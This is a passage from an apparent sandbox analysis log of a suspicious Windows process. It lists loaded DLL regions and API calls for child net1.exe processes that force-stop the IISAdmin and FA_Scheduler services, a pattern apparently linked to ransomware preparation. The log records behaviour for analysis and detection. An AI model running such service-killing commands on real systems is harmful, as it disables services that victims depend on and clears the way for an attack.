"c:\\windows\\system32\\ntdsapi.dll") Region: id = 5655 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5656 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5657 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5658 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5659 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5660 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5661 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5662 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5663 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5664 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5665 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5666 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5667 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5668 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5798 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 527 os_tid = 0xc40 [0097.280] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe30 | out: lpSystemTimeAsFileTime=0x26fe30*(dwLowDateTime=0xef262110, dwHighDateTime=0x1d48689)) [0097.280] GetCurrentProcessId () returned 0xf20 [0097.280] GetCurrentThreadId () returned 0xc40 [0097.280] GetTickCount () returned 0x221e1 [0097.280] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe38 | out: lpPerformanceCount=0x26fe38*=1814419800000) returned 1 [0097.282] GetModuleHandleW (lpModuleName=0x0) returned 0xffd10000 [0097.435] __set_app_type (_Type=0x1) [0097.435] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd29c9c) returned 0x0 [0097.435] __getmainargs (in: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788, _DoWildCard=0, _StartInfo=0xffd3479c | out: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788) returned 0 [0097.436] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.436] GetConsoleOutputCP () returned 0x1b5 [0097.436] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffd3cec0 | out: lpCPInfo=0xffd3cec0) returned 1 [0097.436] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0097.437] sprintf_s (in: _DstBuf=0x26fdd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0097.438] setlocale (category=0, locale=".437") returned="English_United States.437" [0097.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0097.439] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.439] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IISAdmin /y" [0097.439] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fb70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0097.439] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0097.439] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fdc8 | out: Buffer=0x26fdc8*=0x364d40) returned 0x0 [0097.439] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fdc8 | out: Buffer=0x26fdc8*=0x36c0e0) returned 0x0 [0097.439] _fileno (_File=0x7fefdba2a80) returned 0 [0097.439] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0097.439] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0097.439] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0097.439] _wcsicmp (_String1="config", _String2="stop") returned -16 [0097.439] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0097.439] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0097.439] _wcsicmp (_String1="file", _String2="stop") returned -13 [0097.439] _wcsicmp (_String1="files", _String2="stop") returned -13 [0097.440] _wcsicmp (_String1="group", _String2="stop") returned -12 [0097.440] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0097.440] _wcsicmp (_String1="help", _String2="stop") returned -11 [0097.440] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0097.440] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0097.440] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0097.440] _wcsicmp (_String1="session", _String2="stop") returned -15 [0097.440] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0097.440] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0097.440] _wcsicmp (_String1="share", _String2="stop") returned -12 [0097.440] _wcsicmp (_String1="start", _String2="stop") returned -14 [0097.440] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0097.440] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0097.440] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0097.440] _wcsicmp (_String1="accounts", _String2="IISAdmin") returned -8 [0097.440] _wcsicmp (_String1="computer", _String2="IISAdmin") returned -6 [0097.440] _wcsicmp (_String1="config", _String2="IISAdmin") returned -6 [0097.440] _wcsicmp (_String1="continue", _String2="IISAdmin") returned -6 [0097.440] _wcsicmp (_String1="cont", _String2="IISAdmin") returned -6 [0097.440] _wcsicmp (_String1="file", _String2="IISAdmin") returned -3 [0097.440] _wcsicmp (_String1="files", _String2="IISAdmin") returned -3 [0097.440] _wcsicmp (_String1="group", _String2="IISAdmin") returned -2 [0097.440] _wcsicmp (_String1="groups", _String2="IISAdmin") returned -2 [0097.440] _wcsicmp (_String1="help", _String2="IISAdmin") returned -1 [0097.440] _wcsicmp (_String1="helpmsg", _String2="IISAdmin") returned -1 [0097.440] _wcsicmp (_String1="localgroup", _String2="IISAdmin") returned 3 [0097.440] _wcsicmp (_String1="pause", _String2="IISAdmin") returned 7 [0097.440] _wcsicmp (_String1="session", _String2="IISAdmin") returned 10 [0097.440] _wcsicmp (_String1="sessions", _String2="IISAdmin") returned 10 [0097.440] _wcsicmp (_String1="sess", _String2="IISAdmin") returned 10 [0097.440] _wcsicmp (_String1="share", _String2="IISAdmin") returned 10 [0097.440] _wcsicmp (_String1="start", _String2="IISAdmin") returned 10 [0097.440] _wcsicmp (_String1="stats", _String2="IISAdmin") returned 10 [0097.440] _wcsicmp (_String1="statistics", _String2="IISAdmin") returned 10 [0097.441] _wcsicmp (_String1="stop", _String2="IISAdmin") returned 10 [0097.441] _wcsicmp (_String1="time", _String2="IISAdmin") returned 11 [0097.441] _wcsicmp (_String1="user", _String2="IISAdmin") returned 12 [0097.441] _wcsicmp (_String1="users", _String2="IISAdmin") returned 12 [0097.441] _wcsicmp (_String1="msg", _String2="IISAdmin") returned 4 [0097.441] _wcsicmp (_String1="messenger", _String2="IISAdmin") returned 4 [0097.441] _wcsicmp (_String1="receiver", _String2="IISAdmin") returned 9 [0097.441] _wcsicmp (_String1="rcv", _String2="IISAdmin") returned 9 [0097.441] _wcsicmp (_String1="netpopup", _String2="IISAdmin") returned 5 [0097.441] _wcsicmp (_String1="redirector", _String2="IISAdmin") returned 9 [0097.441] _wcsicmp (_String1="redir", _String2="IISAdmin") returned 9 [0097.441] _wcsicmp (_String1="rdr", _String2="IISAdmin") returned 9 [0097.441] _wcsicmp (_String1="workstation", _String2="IISAdmin") returned 14 [0097.441] _wcsicmp (_String1="work", _String2="IISAdmin") returned 14 [0097.441] _wcsicmp (_String1="wksta", _String2="IISAdmin") returned 14 [0097.441] _wcsicmp (_String1="prdr", _String2="IISAdmin") returned 7 [0097.441] _wcsicmp (_String1="devrdr", _String2="IISAdmin") returned -5 [0097.441] _wcsicmp (_String1="lanmanworkstation", _String2="IISAdmin") returned 3 [0097.441] _wcsicmp (_String1="server", _String2="IISAdmin") returned 10 [0097.441] _wcsicmp (_String1="svr", _String2="IISAdmin") returned 10 [0097.441] _wcsicmp (_String1="srv", _String2="IISAdmin") returned 10 [0097.441] _wcsicmp (_String1="lanmanserver", _String2="IISAdmin") returned 3 [0097.441] _wcsicmp (_String1="alerter", _String2="IISAdmin") returned -8 [0097.441] _wcsicmp (_String1="netlogon", _String2="IISAdmin") returned 5 [0097.441] _wcsupr (in: _String="IISAdmin" | out: _String="IISADMIN") returned="IISADMIN" [0097.442] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36cdf0 [0097.445] GetServiceKeyNameW (in: hSCManager=0x36cdf0, lpDisplayName="IISADMIN", lpServiceName=0xffd35750, lpcchBuffer=0x26fce8 | out: lpServiceName="", lpcchBuffer=0x26fce8) returned 0 [0097.447] _wcsicmp (_String1="msg", _String2="IISADMIN") returned 4 [0097.447] _wcsicmp (_String1="messenger", _String2="IISADMIN") returned 4 [0097.447] _wcsicmp (_String1="receiver", _String2="IISADMIN") returned 9 [0097.447] _wcsicmp (_String1="rcv", _String2="IISADMIN") returned 9 [0097.447] _wcsicmp (_String1="redirector", _String2="IISADMIN") returned 9 [0097.447] _wcsicmp (_String1="redir", _String2="IISADMIN") returned 9 [0097.447] _wcsicmp (_String1="rdr", _String2="IISADMIN") returned 9 [0097.447] _wcsicmp (_String1="workstation", _String2="IISADMIN") returned 14 [0097.447] _wcsicmp (_String1="work", _String2="IISADMIN") returned 14 [0097.447] _wcsicmp (_String1="wksta", _String2="IISADMIN") returned 14 [0097.447] _wcsicmp (_String1="prdr", _String2="IISADMIN") returned 7 [0097.447] _wcsicmp (_String1="devrdr", _String2="IISADMIN") returned -5 [0097.447] _wcsicmp (_String1="lanmanworkstation", _String2="IISADMIN") returned 3 [0097.447] _wcsicmp (_String1="server", _String2="IISADMIN") returned 10 [0097.447] _wcsicmp (_String1="svr", _String2="IISADMIN") returned 10 [0097.447] _wcsicmp (_String1="srv", _String2="IISADMIN") returned 10 [0097.447] _wcsicmp (_String1="lanmanserver", _String2="IISADMIN") returned 3 [0097.447] _wcsicmp (_String1="alerter", _String2="IISADMIN") returned -8 [0097.447] _wcsicmp (_String1="netlogon", _String2="IISADMIN") returned 5 [0097.447] NetServiceControl (in: servername=0x0, service="IISADMIN", opcode=0x0, arg=0x0, bufptr=0x26fcf0 | out: bufptr=0x26fcf0) returned 0x889 [0097.448] wcscpy_s (in: _Destination=0xffd380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0097.448] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0097.449] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0097.450] GetFileType (hFile=0xb) returned 0x2 [0097.450] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbb8 | out: lpMode=0x26fbb8) returned 1 [0097.451] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fbb0, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x26fbb0*=0x1e) returned 1 [0097.451] GetFileType (hFile=0xb) returned 0x2 [0097.451] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbb8 | out: lpMode=0x26fbb8) returned 1 [0097.451] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fbb0, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x26fbb0*=0x2) returned 1 [0097.452] _ultow (in: _Dest=0x889, _Radix=2554912 | out: _Dest=0x889) returned="2185" [0097.452] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0097.452] GetFileType (hFile=0xb) returned 0x2 [0097.452] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbb8 | out: lpMode=0x26fbb8) returned 1 [0097.453] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fbb0, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x26fbb0*=0x34) returned 1 [0097.453] GetFileType (hFile=0xb) returned 0x2 [0097.453] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbb8 | out: lpMode=0x26fbb8) returned 1 [0097.453] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fbb0, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x26fbb0*=0x2) returned 1 [0097.454] NetApiBufferFree (Buffer=0x364d40) returned 0x0 [0097.454] NetApiBufferFree (Buffer=0x36c0e0) returned 0x0 [0097.454] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IISAdmin /y" [0097.454] exit (_Code=2) Process: id = "119" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x62060000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "115" os_parent_pid = "0x12d0" cmd_line = "C:\\Windows\\system32\\net1 stop FA_Scheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5669 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5670 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5671 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5672 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 5673 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5674 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5675 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5676 start_va = 0xffd10000 end_va = 0xffd42fff entry_point = 0xffd10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5677 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5678 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5679 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 5680 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5681 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 5682 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5683 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5684 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5685 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5686 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5687 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5688 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5689 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5690 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5691 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5692 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5693 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5694 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5695 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5696 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5697 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5698 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5699 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5700 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5701 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5702 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5703 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5704 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5705 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5706 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5799 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 528 os_tid = 0xc24 [0097.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efe90 | out: lpSystemTimeAsFileTime=0x1efe90*(dwLowDateTime=0xef2d4530, dwHighDateTime=0x1d48689)) [0097.324] GetCurrentProcessId () returned 0xf38 [0097.324] GetCurrentThreadId () returned 0xc24 [0097.324] GetTickCount () returned 0x22210 [0097.324] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe98 | out: lpPerformanceCount=0x1efe98*=1814424300000) returned 1 [0097.326] GetModuleHandleW (lpModuleName=0x0) returned 0xffd10000 [0097.326] __set_app_type (_Type=0x1) [0097.326] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd29c9c) returned 0x0 [0097.326] __getmainargs (in: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788, _DoWildCard=0, _StartInfo=0xffd3479c | out: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788) returned 0 [0097.326] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.326] GetConsoleOutputCP () returned 0x1b5 [0097.473] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffd3cec0 | out: lpCPInfo=0xffd3cec0) returned 1 [0097.473] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0097.488] sprintf_s (in: _DstBuf=0x1efe38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0097.488] setlocale (category=0, locale=".437") returned="English_United States.437" [0097.490] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0097.490] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.490] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FA_Scheduler /y" [0097.490] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efbd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0097.490] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0097.490] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1efe28 | out: Buffer=0x1efe28*=0x234d50) returned 0x0 [0097.490] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1efe28 | out: Buffer=0x1efe28*=0x23c100) returned 0x0 [0097.490] _fileno (_File=0x7fefdba2a80) returned 0 [0097.490] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0097.490] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0097.490] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0097.491] _wcsicmp (_String1="config", _String2="stop") returned -16 [0097.491] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0097.491] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0097.491] _wcsicmp (_String1="file", _String2="stop") returned -13 [0097.491] _wcsicmp (_String1="files", _String2="stop") returned -13 [0097.491] _wcsicmp (_String1="group", _String2="stop") returned -12 [0097.491] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0097.491] _wcsicmp (_String1="help", _String2="stop") returned -11 [0097.491] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0097.491] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0097.491] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0097.491] _wcsicmp (_String1="session", _String2="stop") returned -15 [0097.491] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0097.491] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0097.491] _wcsicmp (_String1="share", _String2="stop") returned -12 [0097.491] _wcsicmp (_String1="start", _String2="stop") returned -14 [0097.491] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0097.491] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0097.491] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0097.491] _wcsicmp (_String1="accounts", _String2="FA_Scheduler") returned -5 [0097.491] _wcsicmp (_String1="computer", _String2="FA_Scheduler") returned -3 [0097.491] _wcsicmp (_String1="config", _String2="FA_Scheduler") returned -3 [0097.491] _wcsicmp (_String1="continue", _String2="FA_Scheduler") returned -3 [0097.491] _wcsicmp (_String1="cont", _String2="FA_Scheduler") returned -3 [0097.491] _wcsicmp (_String1="file", _String2="FA_Scheduler") returned 8 [0097.491] _wcsicmp (_String1="files", _String2="FA_Scheduler") returned 8 [0097.491] _wcsicmp (_String1="group", _String2="FA_Scheduler") returned 1 [0097.491] _wcsicmp (_String1="groups", _String2="FA_Scheduler") returned 1 [0097.491] _wcsicmp (_String1="help", _String2="FA_Scheduler") returned 2 [0097.491] _wcsicmp (_String1="helpmsg", _String2="FA_Scheduler") returned 2 [0097.491] _wcsicmp (_String1="localgroup", _String2="FA_Scheduler") returned 6 [0097.491] _wcsicmp (_String1="pause", _String2="FA_Scheduler") returned 10 [0097.491] _wcsicmp (_String1="session", _String2="FA_Scheduler") returned 13 [0097.491] _wcsicmp (_String1="sessions", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="sess", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="share", 